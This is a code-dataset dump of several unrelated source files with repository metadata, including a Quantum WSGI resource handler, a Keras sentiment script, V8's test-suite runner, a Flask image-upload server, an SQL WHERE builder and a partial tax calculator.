return self.accept.best_match(supported,
default_match='application/json')
@property
def context(self):
#Eventually the Auth[NZ] code will supply this. (mdragon)
#when that happens this if block should raise instead.
if 'quantum.context' not in self.environ:
self.environ['quantum.context'] = context.get_admin_context()
return self.environ['quantum.context']
def Resource(controller, faults=None, deserializers=None, serializers=None):
"""Represents an API entity resource and the associated serialization and
deserialization logic
"""
default_deserializers = {'application/xml': wsgi.XMLDeserializer(),
'application/json': lambda x: json.loads(x)}
default_serializers = {'application/xml': wsgi.XMLDictSerializer(),
'application/json': lambda x: json.dumps(x)}
format_types = {'xml': 'application/xml',
'json': 'application/json'}
action_status = dict(create=201, delete=204)
default_deserializers.update(deserializers or {})
default_serializers.update(serializers or {})
deserializers = default_deserializers
serializers = default_serializers
faults = faults or {}
@webob.dec.wsgify(RequestClass=Request)
def resource(request):
route_args = request.environ.get('wsgiorg.routing_args')
if route_args:
args = route_args[1].copy()
else:
args = {}
# NOTE(jkoelker) by now the controller is already found, remove
# it from the args if it is in the matchdict
args.pop('controller', None)
fmt = args.pop('format', None)
action = args.pop('action', None)
content_type = format_types.get(fmt,
request.best_match_content_type())
deserializer = deserializers.get(content_type)
serializer = serializers.get(content_type)
try:
if request.body:
args['body'] = deserializer(request.body)
method = getattr(controller, action)
result = method(request=request, **args)
except (ValueError, AttributeError,
exceptions.QuantumException,
netaddr.AddrFormatError) as e:
LOG.exception('%s failed' % action)
body = serializer({'QuantumError': str(e)})
kwargs = {'body': body, 'content_type': content_type}
for fault in faults:
if isinstance(e, fault):
raise faults[fault](**kwargs)
raise webob.exc.HTTPInternalServerError(**kwargs)
except webob.exc.HTTPException as e:
LOG.exception('%s failed' % action)
e.body = serializer({'QuantumError': str(e)})
e.content_type = content_type
raise
except Exception as e:
# NOTE(jkoelker) Everyting else is 500
LOG.exception('%s failed' % action)
# Do not expose details of 500 error to clients.
msg = _('Request Failed: internal server error while '
'processing your request.')
body = serializer({'QuantumError': msg})
kwargs = {'body': body, 'content_type': content_type}
raise webob.exc.HTTPInternalServerError(**kwargs)
status = action_status.get(action, 200)
body = serializer(result)
# NOTE(jkoelker) Comply with RFC2616 section 9.7
if status == 204:
content_type = ''
body = None
return webob.Response(request=request, status=status,
content_type=content_type,
body=body)
return resource
| [
"quan.xu@intel.com"
] | quan.xu@intel.com |
f03153a59de4a234d11b84dcec0f9f4e0910c662 | a67f7ae56ff7fcbd1fe665c77e7efc1ba54b7675 | /TextClassification/testing_cnn_lstm.py | 0acec085b9a00d94499aa2be28bff009a73f4f50 | [] | no_license | thdiaman/deeplearning | a013d16c59932ccfe62d87012613093d3a46e9d3 | 9ddc46b6ad257ad0885d1d5dc8eb64589d618f2b | refs/heads/master | 2021-07-02T02:08:52.778443 | 2019-05-31T23:42:14 | 2019-05-31T23:42:14 | 133,405,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | # Import basic libraries and keras
import json
from keras.models import load_model
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
# Load the model, either 'cnn_model.h5' or 'lstm_model.h5'
model = load_model('cnn_model.h5')
# Load the dictionary and the model
with open('dictionary.json', 'r') as dictionary_file:
dictionary = json.load(dictionary_file)
tokenizer = Tokenizer(num_words=3000)
tokenizer.word_index = dictionary
while 1:
text = input('Input a sentence to evaluate its sentiment, or press enter to quit: ')
if len(text) == 0:
break
# Make the prediction
sequences = tokenizer.texts_to_sequences([text])
padded_sequences = pad_sequences(sequences, maxlen=300)
pred = model.predict(padded_sequences)
print("The sentiment is %s (confidence: %.2f%%)" % ("positive" if pred > 0.5 else "negative", 100 * max(pred, 1 - pred)))
| [
"themisdiamantopoulos@hotmail.com"
] | themisdiamantopoulos@hotmail.com |
4b7fd03b0c233030ec89fb538722a130ae795def | e3df9942558c81f89cdc13a519f517bf8d403aa6 | /esm2m/setup.py | 1f93c6100b8f7558ecc7171b69dc3d4503d75b0d | [
"MIT"
] | permissive | ystochel/esm2m | a4de1f8164ada23d4c98f6b10bf121f5f7e9ff71 | 0a133dc69dd72ab8c4c7537632e070bf5a32c9a6 | refs/heads/master | 2022-12-03T13:46:12.202867 | 2020-08-14T01:56:27 | 2020-08-14T01:56:27 | 267,344,418 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='PEI Summer Internship 2020',
author='ystochel',
license='MIT',
)
| [
"ystochel@flyingfish.princeton.edu"
] | ystochel@flyingfish.princeton.edu |
007692cd016585291035ae82627b954f89929568 | 9be19b8015a1405235e0457756fcfa688f1f6797 | /Chapter-09/mad_libs.py | 0894e7ab2021d351bafc3e2ffabe36841d9fe2da | [] | no_license | SilentCruzer/Automate-the-boring-stuff-with-python | b2b5de6554e0958c143110f4f2bcbc209a8cbb36 | ad561a8cc500a88f38f083be4179345f61fbc952 | refs/heads/master | 2023-02-15T21:03:11.213267 | 2021-01-06T16:49:34 | 2021-01-06T16:49:34 | 323,024,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | import sys, re
replace_words = ['ADJECTIVE', 'NOUN', 'ADVERB', 'VERB']
with open('mad_libs_text.txt') as f:
sentence = f.read()
for word in replace_words:
while(word in sentence):
replace = input("Enter an " + word.lower() + ": " )
sentence = sentence.replace(word, replace, 1)
print(sentence)
with open("mad_Libs_after.txt",'w') as f:
f.write(sentence)
| [
"radithykumar7@gmail.com"
] | radithykumar7@gmail.com |
b93919749d0ffe49d019f0a0385ed8d83d3592da | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /v8/tools/testrunner/local/testsuite.py | f7fa19b20a0b5ce18abe0cd934fbbe12145291b8 | [
"BSD-3-Clause",
"SunPro",
"bzip2-1.0.6"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 12,313 | py | # Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import os
from . import commands
from . import statusfile
from . import utils
from ..objects import testcase
from variants import ALL_VARIANTS, ALL_VARIANT_FLAGS, FAST_VARIANT_FLAGS
FAST_VARIANTS = set(["default", "turbofan"])
STANDARD_VARIANT = set(["default"])
class VariantGenerator(object):
def __init__(self, suite, variants):
self.suite = suite
self.all_variants = ALL_VARIANTS & variants
self.fast_variants = FAST_VARIANTS & variants
self.standard_variant = STANDARD_VARIANT & variants
def FilterVariantsByTest(self, testcase):
result = self.all_variants
if testcase.outcomes:
if statusfile.OnlyStandardVariant(testcase.outcomes):
return self.standard_variant
if statusfile.OnlyFastVariants(testcase.outcomes):
result = self.fast_variants
return result
def GetFlagSets(self, testcase, variant):
if testcase.outcomes and statusfile.OnlyFastVariants(testcase.outcomes):
return FAST_VARIANT_FLAGS[variant]
else:
return ALL_VARIANT_FLAGS[variant]
class TestSuite(object):
@staticmethod
def LoadTestSuite(root, global_init=True):
name = root.split(os.path.sep)[-1]
f = None
try:
(f, pathname, description) = imp.find_module("testcfg", [root])
module = imp.load_module("testcfg", f, pathname, description)
return module.GetSuite(name, root)
except ImportError:
# Use default if no testcfg is present.
return GoogleTestSuite(name, root)
finally:
if f:
f.close()
def __init__(self, name, root):
# Note: This might be called concurrently from different processes.
self.name = name # string
self.root = root # string containing path
self.tests = None # list of TestCase objects
self.rules = None # dictionary mapping test path to list of outcomes
self.wildcards = None # dictionary mapping test paths to list of outcomes
self.total_duration = None # float, assigned on demand
def shell(self):
return "d8"
def suffix(self):
return ".js"
def status_file(self):
return "%s/%s.status" % (self.root, self.name)
# Used in the status file and for stdout printing.
def CommonTestName(self, testcase):
if utils.IsWindows():
return testcase.path.replace("\\", "/")
else:
return testcase.path
def ListTests(self, context):
raise NotImplementedError
def _VariantGeneratorFactory(self):
"""The variant generator class to be used."""
return VariantGenerator
def CreateVariantGenerator(self, variants):
"""Return a generator for the testing variants of this suite.
Args:
variants: List of variant names to be run as specified by the test
runner.
Returns: An object of type VariantGenerator.
"""
return self._VariantGeneratorFactory()(self, set(variants))
def PrepareSources(self):
"""Called once before multiprocessing for doing file-system operations.
This should not access the network. For network access use the method
below.
"""
pass
def DownloadData(self):
pass
def ReadStatusFile(self, variables):
with open(self.status_file()) as f:
self.rules, self.wildcards = (
statusfile.ReadStatusFile(f.read(), variables))
def ReadTestCases(self, context):
self.tests = self.ListTests(context)
@staticmethod
def _FilterSlow(slow, mode):
return (mode == "run" and not slow) or (mode == "skip" and slow)
@staticmethod
def _FilterPassFail(pass_fail, mode):
return (mode == "run" and not pass_fail) or (mode == "skip" and pass_fail)
def FilterTestCasesByStatus(self, warn_unused_rules,
slow_tests="dontcare",
pass_fail_tests="dontcare",
variants=False):
# Use only variants-dependent rules and wildcards when filtering
# respective test cases and generic rules when filtering generic test
# cases.
if not variants:
rules = self.rules[""]
wildcards = self.wildcards[""]
else:
# We set rules and wildcards to a variant-specific version for each test
# below.
rules = {}
wildcards = {}
filtered = []
# Remember used rules as tuples of (rule, variant), where variant is "" for
# variant-independent rules.
used_rules = set()
for t in self.tests:
slow = False
pass_fail = False
testname = self.CommonTestName(t)
variant = t.variant or ""
if variants:
rules = self.rules[variant]
wildcards = self.wildcards[variant]
if testname in rules:
used_rules.add((testname, variant))
# Even for skipped tests, as the TestCase object stays around and
# PrintReport() uses it.
t.outcomes = t.outcomes | rules[testname]
if statusfile.DoSkip(t.outcomes):
continue # Don't add skipped tests to |filtered|.
for outcome in t.outcomes:
if outcome.startswith('Flags: '):
t.flags += outcome[7:].split()
slow = statusfile.IsSlow(t.outcomes)
pass_fail = statusfile.IsPassOrFail(t.outcomes)
skip = False
for rule in wildcards:
assert rule[-1] == '*'
if testname.startswith(rule[:-1]):
used_rules.add((rule, variant))
t.outcomes = t.outcomes | wildcards[rule]
if statusfile.DoSkip(t.outcomes):
skip = True
break # "for rule in wildcards"
slow = slow or statusfile.IsSlow(t.outcomes)
pass_fail = pass_fail or statusfile.IsPassOrFail(t.outcomes)
if (skip
or self._FilterSlow(slow, slow_tests)
or self._FilterPassFail(pass_fail, pass_fail_tests)):
continue # "for t in self.tests"
filtered.append(t)
self.tests = filtered
if not warn_unused_rules:
return
if not variants:
for rule in self.rules[""]:
if (rule, "") not in used_rules:
print("Unused rule: %s -> %s (variant independent)" % (
rule, self.rules[""][rule]))
for rule in self.wildcards[""]:
if (rule, "") not in used_rules:
print("Unused rule: %s -> %s (variant independent)" % (
rule, self.wildcards[""][rule]))
else:
for variant in ALL_VARIANTS:
for rule in self.rules[variant]:
if (rule, variant) not in used_rules:
print("Unused rule: %s -> %s (variant: %s)" % (
rule, self.rules[variant][rule], variant))
for rule in self.wildcards[variant]:
if (rule, variant) not in used_rules:
print("Unused rule: %s -> %s (variant: %s)" % (
rule, self.wildcards[variant][rule], variant))
def FilterTestCasesByArgs(self, args):
"""Filter test cases based on command-line arguments.
An argument with an asterisk in the end will match all test cases
that have the argument as a prefix. Without asterisk, only exact matches
will be used with the exeption of the test-suite name as argument.
"""
filtered = []
globs = []
exact_matches = []
for a in args:
argpath = a.split('/')
if argpath[0] != self.name:
continue
if len(argpath) == 1 or (len(argpath) == 2 and argpath[1] == '*'):
return # Don't filter, run all tests in this suite.
path = '/'.join(argpath[1:])
if path[-1] == '*':
path = path[:-1]
globs.append(path)
else:
exact_matches.append(path)
for t in self.tests:
for a in globs:
if t.path.startswith(a):
filtered.append(t)
break
for a in exact_matches:
if t.path == a:
filtered.append(t)
break
self.tests = filtered
def GetFlagsForTestCase(self, testcase, context):
raise NotImplementedError
def GetSourceForTest(self, testcase):
return "(no source available)"
def IsFailureOutput(self, testcase):
return testcase.output.exit_code != 0
def IsNegativeTest(self, testcase):
return False
def HasFailed(self, testcase):
execution_failed = self.IsFailureOutput(testcase)
if self.IsNegativeTest(testcase):
return not execution_failed
else:
return execution_failed
def GetOutcome(self, testcase):
if testcase.output.HasCrashed():
return statusfile.CRASH
elif testcase.output.HasTimedOut():
return statusfile.TIMEOUT
elif self.HasFailed(testcase):
return statusfile.FAIL
else:
return statusfile.PASS
def HasUnexpectedOutput(self, testcase):
outcome = self.GetOutcome(testcase)
return not outcome in (testcase.outcomes or [statusfile.PASS])
def StripOutputForTransmit(self, testcase):
if not self.HasUnexpectedOutput(testcase):
testcase.output.stdout = ""
testcase.output.stderr = ""
def CalculateTotalDuration(self):
self.total_duration = 0.0
for t in self.tests:
self.total_duration += t.duration
return self.total_duration
class StandardVariantGenerator(VariantGenerator):
def FilterVariantsByTest(self, testcase):
return self.standard_variant
class GoogleTestSuite(TestSuite):
def __init__(self, name, root):
super(GoogleTestSuite, self).__init__(name, root)
def ListTests(self, context):
shell = os.path.abspath(os.path.join(context.shell_dir, self.shell()))
if utils.IsWindows():
shell += ".exe"
output = None
for i in xrange(3): # Try 3 times in case of errors.
output = commands.Execute(context.command_prefix +
[shell, "--gtest_list_tests"] +
context.extra_flags)
if output.exit_code == 0:
break
print "Test executable failed to list the tests (try %d).\n\nStdout:" % i
print output.stdout
print "\nStderr:"
print output.stderr
print "\nExit code: %d" % output.exit_code
else:
raise Exception("Test executable failed to list the tests.")
tests = []
test_case = ''
for line in output.stdout.splitlines():
test_desc = line.strip().split()[0]
if test_desc.endswith('.'):
test_case = test_desc
elif test_case and test_desc:
test = testcase.TestCase(self, test_case + test_desc)
tests.append(test)
tests.sort(key=lambda t: t.path)
return tests
def GetFlagsForTestCase(self, testcase, context):
return (testcase.flags + ["--gtest_filter=" + testcase.path] +
["--gtest_random_seed=%s" % context.random_seed] +
["--gtest_print_time=0"] +
context.mode_flags)
def _VariantGeneratorFactory(self):
return StandardVariantGenerator
def shell(self):
return self.name
| [
"enrico.weigelt@gr13.net"
] | enrico.weigelt@gr13.net |
b100512b577573496e2a4b06b4ecba61f76b9160 | 0cb8f0f422c790e75da3d3e4d277390039a72637 | /assignment1/question.py | f461ff4af675756623bb5336d0721daddea9cf3d | [] | no_license | curow/CS231N | aa62812bb5698e5b10856dd8f700f56bca2e980a | feafeee3081e22cfc23f5643d71f45e0e6e636f4 | refs/heads/master | 2021-09-04T17:44:25.291119 | 2018-01-20T16:57:51 | 2018-01-20T16:57:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,303 | py | def svm_loss_vectorized(W, X, y, reg):
"""
Structured SVM loss function, vectorized implementation.
Inputs and outputs are the same as svm_loss_naive.
"""
loss = 0.0
dW = np.zeros(W.shape) # initialize the gradient as zero
# transpose X and W
# X.shape will be (D,N)
# W.shape will be (C,D)
X = X.T
W = W.T
dW = dW.T
num_train = X.shape[1]
# W_y shape from (N,D) to (D,N)
W_y = W[y].T
S_y = np.sum(W_y*X ,axis=0)
margins = np.dot(W,X) + 1 - S_y
mask = np.array(margins>0)
# get the value of num_train examples made on W's gradient
# that is,only when the mask is positive
# the train example has impact on W's gradient
dW_j = np.dot(mask, X.T)
dW += dW_j
mul_mask = np.sum(mask, axis=0, keepdims=True).T
# dW[y] -= mul_mask * X.T
dW_y = mul_mask * X.T
for i,label in enumerate(y):
dW[label] -= dW_y[i]
loss = np.sum(margins*mask) - num_train
loss /= num_train
dW /= num_train
# add regularization term
loss += reg * np.sum(W*W)
dW += reg * 2 * W
dW = dW.T
return loss, dW | [
"TiwazBiu@gmail.com"
] | TiwazBiu@gmail.com |
2c859a6f2acfe8a6f7648e36a4e2293e29ec40bf | a5875775b1ccaf45d18945c719feb398f45dbc93 | /server.py | e0b0f1bf608823e2b2e9b3d6e7072bdac6c76f99 | [] | no_license | bananacatsky/myu | 694541cf9c1872e76307a221231a42d4e36227dd | 2c38c6966d2b7b523a4d05001864298f94143b34 | refs/heads/master | 2020-09-06T22:00:31.225375 | 2019-06-23T23:18:09 | 2019-06-23T23:18:09 | 220,567,879 | 1 | 0 | null | 2019-11-09T00:16:29 | 2019-11-09T00:16:28 | null | UTF-8 | Python | false | false | 1,377 | py | import os
from flask import Flask, request, redirect, url_for
from werkzeug.utils import secure_filename
from flask import send_from_directory
from process import mix
UPLOAD_FOLDER = r'uploads'
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
file = request.files['file']
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
savepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
file.save(savepath)
video_path = mix(savepath)
return redirect(url_for('uploaded_file', filename='out.mp4'))
return '''
<!doctype html>
<title>Upload image</title>
<h1>Upload image</h1>
<form action="" method=post enctype=multipart/form-data>
<p><input type=file name=file>
<input type=submit value="Upload image">
</form>
'''
@app.route('/uploads/<filename>')
def uploaded_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], "out.mp4", as_attachment=True)
if __name__ == '__main__':
os.makedirs("uploads", exist_ok=True)
app.run()
| [
"sknek@ya.ru"
] | sknek@ya.ru |
0331c7d64d9c4561496104cd1e73f30ef345945b | 403a8c7d9ba2956c3f5873d0721921e0d8ae7c65 | /tests/test_cli.py | 13cee7104e6617fae0738f12d22c77060adeb91a | [
"MIT"
] | permissive | kazhala/fzf.aws | b0c83f0ac47f1b2da0d0b064d6a688ba2e69028c | 4abefb2301f7b489b11ed3f0b303faafa5941d5b | refs/heads/master | 2021-07-05T00:50:12.632284 | 2021-05-25T23:09:51 | 2021-05-25T23:09:51 | 242,327,229 | 68 | 3 | MIT | 2021-03-25T23:42:00 | 2020-02-22T11:09:11 | Python | UTF-8 | Python | false | false | 3,065 | py | from botocore.exceptions import ClientError
from fzfaws.utils.exceptions import InvalidFileType
import os
from fzfaws.utils.fileloader import FileLoader
import unittest
from unittest.mock import patch
from fzfaws.cli import main, copy_config
import sys
import io
from pathlib import Path
import tempfile
class TestCLI(unittest.TestCase):
def setUp(self):
self.capturedOuput = io.StringIO()
sys.stdout = self.capturedOuput
config_path = Path(__file__).resolve().parent.joinpath("../fzfaws/fzfaws.yml")
fileloader = FileLoader()
fileloader.load_config_file(config_path=str(config_path))
def tearDown(self):
sys.stdout = sys.__stdout__
@patch("fzfaws.cli.s3")
@patch("fzfaws.cli.ec2")
@patch("fzfaws.cli.cloudformation")
def test_subparser(self, mocked_cloudformation, mocked_ec2, mocked_s3):
sys.argv = [__file__, "cloudformation", "-h"]
main()
mocked_cloudformation.assert_called_once_with(["-h"])
sys.argv = [__file__, "ec2", "ssh", "-A"]
main()
mocked_ec2.assert_called_once_with(["ssh", "-A"])
mocked_ec2.reset_mock()
sys.argv = [__file__, "ec2", "start"]
main()
mocked_ec2.assert_called_once_with(["start", "--wait"])
sys.argv = [__file__, "s3", "download"]
main()
mocked_s3.assert_called_once_with(["download", "--hidden"])
@patch("fzfaws.cli.copy_config")
def test_parser(self, mocked_copy):
sys.argv = [__file__, "-h"]
self.assertRaises(SystemExit, main)
self.assertRegex(
self.capturedOuput.getvalue(), r"usage: fzfaws .*",
)
sys.argv = [__file__, "--copy-config"]
self.assertRaises(SystemExit, main)
mocked_copy.assert_called_once()
self.capturedOuput.truncate(0)
self.capturedOuput.seek(0)
sys.argv = [__file__]
self.assertRaises(SystemExit, main)
self.assertRegex(self.capturedOuput.getvalue(), r"^usage: fzfaws \[-h\].*")
def test_copy_config(self):
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ["XDG_CONFIG_HOME"] = tmpdirname
copy_config()
if not Path("%s/fzfaws/fzfaws.yml" % tmpdirname).is_file():
self.fail("config file not properly copied")
@patch("fzfaws.cli.get_default_args")
def test_exceptions(self, mocked_args):
mocked_args.side_effect = InvalidFileType
sys.argv = [__file__, "s3"]
self.assertRaises(SystemExit, main)
self.assertEqual(
self.capturedOuput.getvalue(), "Selected file is not a valid file type\n"
)
mocked_args.side_effect = SystemExit
sys.argv = [__file__, "s3"]
self.assertRaises(SystemExit, main)
mocked_args.side_effect = KeyboardInterrupt
sys.argv = [__file__, "s3"]
self.assertRaises(SystemExit, main)
mocked_args.side_effect = ClientError
sys.argv = [__file__, "s3"]
self.assertRaises(SystemExit, main)
| [
"kevin7441@gmail.com"
] | kevin7441@gmail.com |
b12564d2f5104f58ae800d80cb88bb520d543101 | 6d66e5f112f48db059002f9d2bdd0a81e552ad8c | /orb/core/connection_types/sql/mysql/statements/where.py | cb76e1c1639c88bc1e81d751d8667f5a2bd9755d | [
"MIT"
] | permissive | charblanc/orb | 9fd94bb2fbc172e4c3c6a464d83b5c30b11957dd | 1db49eb7eaee4b4fb8ff1024d6652e84a14c67f9 | refs/heads/master | 2021-01-12T22:22:26.932895 | 2016-08-23T02:33:46 | 2016-08-23T02:33:46 | 66,504,604 | 0 | 0 | null | 2016-08-24T22:33:42 | 2016-08-24T22:33:41 | null | UTF-8 | Python | false | false | 7,392 | py | import os
from projex.lazymodule import lazy_import
from ..mysqlconnection import MySQLStatement
orb = lazy_import('orb')
class WHERE(MySQLStatement):
def __call__(self, model, query, aliases=None, fields=None):
if query is None:
return u'', {}
aliases = aliases or {}
fields = fields or {}
data = {}
query = query.expand(model)
# generate a query compound
if isinstance(query, orb.QueryCompound):
sub_query_sql = []
for sub_query in query:
sub_sql, sub_data = self(model, sub_query, aliases, fields)
if sub_sql:
sub_query_sql.append(sub_sql)
data.update(sub_data)
joiner = u' AND ' if query.op() == query.Op.And else u' OR '
sql = u'({0})'.format(joiner.join(sub_query_sql))
else:
column = query.column(model)
if not column:
raise orb.errors.ColumnNotFound(model.schema().name(), query.columnName())
# generate the sql field
field = fields.get(column) or self.generateField(model, column, query, aliases)
value_key = u'{0}_{1}'.format(column.field(), os.urandom(4).encode('hex'))
# calculate any math operations to the sql field
for op, target in query.math():
field = column.dbMath(field, op, target)
# get the additional information
value = query.value()
op = query.op()
case_sensitive = query.caseSensitive()
invert = query.isInverted()
try:
sql_op = self.opSql(op, case_sensitive)
except KeyError:
raise orb.errors.QueryInvalid('{0} is an unknown operator'.format(orb.Query.Op(op)))
def convert_value(val):
if isinstance(val, orb.Model):
return val.get(val.schema().idColumn(), inflated=False)
elif isinstance(val, (tuple, list, set)):
return tuple(convert_value(v) for v in val)
else:
return val
value = convert_value(value)
# convert data from a query
if isinstance(value, (orb.Query, orb.QueryCompound)):
val_model = value.model()
val_column = value.column()
val_field = self.generateField(val_model, val_column, value, aliases)
if invert:
sql = u' '.join((val_field, sql_op, field))
else:
sql = u' '.join((field, sql_op, val_field))
# convert a null value
elif value is None:
if op == orb.Query.Op.Is:
sql = u'{0} IS NULL'.format(field)
elif op == orb.Query.Op.IsNot:
sql = u'{0} IS NOT NULL'.format(field)
else:
raise orb.QueryInvalid('Invalid operation for NULL: {0}'.format(orb.Query.Op(op)))
# convert a collection value
elif isinstance(value, orb.Collection):
SELECT = self.byName('SELECT')
sub_sql, sub_data = SELECT(value.model(), value.context(), fields=fields)
if sub_sql:
sql = u'{0} {1} ({2})'.format(field, sql_op, sub_sql.strip(';'))
data.update(sub_data)
else:
raise orb.QueryInvalid('Could not create sub-query')
# convert all other data
else:
if op in (orb.Query.Op.IsIn, orb.Query.Op.IsNotIn) and not value:
raise orb.errors.QueryIsNull()
elif op in (orb.Query.Op.Contains, orb.Query.Op.DoesNotContain):
value = u'%{0}%'.format(value)
elif op in (orb.Query.Op.Startswith, orb.Query.Op.DoesNotStartwith):
value = u'%{0}'.format(value)
elif op in (orb.Query.Op.Endswith, orb.Query.Op.DoesNotEndwith):
value = u'{0}%'.format(value)
if invert:
opts = (u'%({0})s'.format(value_key), sql_op, field)
else:
opts = (field, sql_op, u'%({0})s'.format(value_key))
sql = u' '.join(opts)
data[value_key] = value
if column.testFlag(column.Flags.I18n) and column not in fields:
model_name = aliases.get(model) or model.schema().dbname()
i18n_sql = u'`{name}`.`{field}` IN (' \
u' SELECT `{name}_id`' \
u' FROM `{namespace}`.`{name}_i18n`' \
u' WHERE {sub_sql}' \
u')'
default_namespace = orb.Context().db.name()
sub_sql = sql.replace('`{0}`'.format(model_name), '`{0}_i18n`'.format(model_name))
sql = i18n_sql.format(name=model_name,
namespace=model.schema().namespace() or default_namespace,
sub_sql=sub_sql,
field=model.schema().idColumn().field())
return sql, data
def generateField(self, model, column, query, aliases):
alias = aliases.get(model) or model.schema().dbname()
field = column.field()
sql_field = '`{0}`.`{1}`'.format(alias, field)
# process any functions on the query
for func in query.functions():
try:
sql_func = self.funcSql(func)
sql_field = sql_func.format(sql_field)
except KeyError:
msg = 'Unknown function type: {0}'.format(orb.Query.Function(func))
raise orb.errors.QueryInvalid(msg)
return sql_field
@staticmethod
def opSql(op, caseSensitive=False):
general_mapping = {
orb.Query.Op.Is: u'=',
orb.Query.Op.IsNot: u'!=',
orb.Query.Op.LessThan: u'<',
orb.Query.Op.Before: u'<',
orb.Query.Op.LessThanOrEqual: u'<=',
orb.Query.Op.GreaterThanOrEqual: u'>=',
orb.Query.Op.GreaterThan: u'>',
orb.Query.Op.After: u'>',
orb.Query.Op.IsIn: u'IN',
orb.Query.Op.IsNotIn: u'NOT IN'
}
sensitive_mapping = {
orb.Query.Op.Matches: u'~',
orb.Query.Op.DoesNotMatch: u'!~',
orb.Query.Op.Contains: u'LIKE',
orb.Query.Op.DoesNotContain: u'NOT LIKE'
}
non_sensitive_mapping = {
orb.Query.Op.Matches: u'~*',
orb.Query.Op.DoesNotMatch: u'!~*',
orb.Query.Op.Contains: u'LIKE',
orb.Query.Op.DoesNotContain: u'NOT LIKE'
}
return general_mapping.get(op) or (sensitive_mapping[op] if caseSensitive else non_sensitive_mapping[op])
@staticmethod
def funcSql(func):
func_mapping = {
orb.Query.Function.Lower: u'lcase({0})',
orb.Query.Function.Upper: u'ucase({0})',
orb.Query.Function.Abs: u'abs({0})',
orb.Query.Function.AsString: u'cast({0} as varchar)'
}
return func_mapping[func]
MySQLStatement.registerAddon('WHERE', WHERE())
| [
"ehulser@teslamotors.com"
] | ehulser@teslamotors.com |
0755c19bf2fd59870c1cef2bc3c27174d800d966 | a946b8ef844ded0e6ad361c7a5fb5b5987f071ab | /Tax.py | 68dec46a23058d3e9e08a6f9ac48ec7c71912620 | [] | no_license | Greenteadrinker/Tutorial9_Tax | 79dcb4c88c0ececcf5ca179be27db89654aec1fb | ad14abfd7c18c9766ce5315078f01b6daf397736 | refs/heads/master | 2021-01-24T17:31:53.651206 | 2018-03-19T14:59:59 | 2018-03-19T14:59:59 | 123,231,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,478 | py | income1 = float(input("Enter the Husband income: "))
income2 = float(input("Enter the Wife income: "))
def singleTaxCal(income1,income2):
#print("Start individual")
BasicAllowance = 132000
MPF1 = min(income1 * 0.05,15000)
#print("MPF1 = ", MPF1)
MPF2 = min(income2 * 0.05,15000)
#print("MPF2 = ", MPF2)
chargeableincome1 = income1 - MPF1 - BasicAllowance
#print("Net Husband Income = ", chargeableincome1)
chargeableincome2 = income2 - MPF2 - BasicAllowance
#print("Net Wife Income = ", chargeableincome2)
tax = [900,3150,5400]
#Start Cal Tax
if (chargeableincome1 > 0):
if (chargeableincome1 <= 45000):
tax1 = chargeableincome1 * 0.02
payTax1 = tax1 - min(tax1 * 0.75,20000)
elif (45001 <= chargeableincome1 <= 90000):
tax1 = (chargeableincome1 - 45000) * 0.07 + tax[0]
payTax1 = tax1 - min(tax1 * 0.75,20000)
elif (90001 <= chargeableincome1 <= 135000):
tax1 = (chargeableincome1 - 45000 * 2) * 0.12 + tax[0] + tax[1]
payTax1 = tax1 - min(tax1 * 0.75,20000)
elif (135001 <= chargeableincome1):
tax1 = (chargeableincome1 - 45000 * 3) * 0.17 + tax[0]+ tax[1] + tax[2]
payTax1 = tax1 - min(tax1 * 0.75,20000)
else:
payTax1 = 0
if (chargeableincome2 > 0):
if (chargeableincome2 <= 45000):
tax2 = chargeableincome2 * 0.02
payTax2 = tax2 - min(tax2 * 0.75,20000)
